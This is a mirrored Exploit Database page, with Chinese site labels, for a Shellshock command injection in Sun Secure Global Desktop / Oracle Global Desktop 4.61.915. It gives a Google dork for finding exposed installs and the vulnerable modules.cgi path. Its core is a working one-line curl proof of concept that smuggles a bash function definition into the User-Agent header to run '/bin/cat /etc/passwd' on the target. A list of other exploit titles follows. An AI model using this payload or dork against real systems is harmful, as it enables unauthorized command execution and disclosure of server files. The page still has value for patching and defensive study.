Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 – Command Injection (Shellshock)

Exploit Database
95 阅读

作者： lastc0de

日期： 2016-06-06
类别：
- webapps
平台：
- cgi
来源：https://www.exploit-db.com/exploits/39887/

# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: lastc0de@outlook.com
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux

VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi

POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt

localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.

last Exploits
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 – Command Injection (Shellshock)的更多信息

Free Article Submissions 1.0 – SQL Injection：
WordPress Plugin Car Rental System 2.5 – SQL Injection：
Trouble Ticket Software – ‘ttx.cgi’ Arbitrary File Download：
zomplog 3.9 – Remote Code Execution (RCE)：
Atom CMS 2.0 – Remote Code Execution (RCE)：
Encore ENPS-2012 – Cross-Site Scripting：
Joomla! 1.6 – Multiple SQL Injections：
Music Gallery Site v1.0 – Broken Access Control：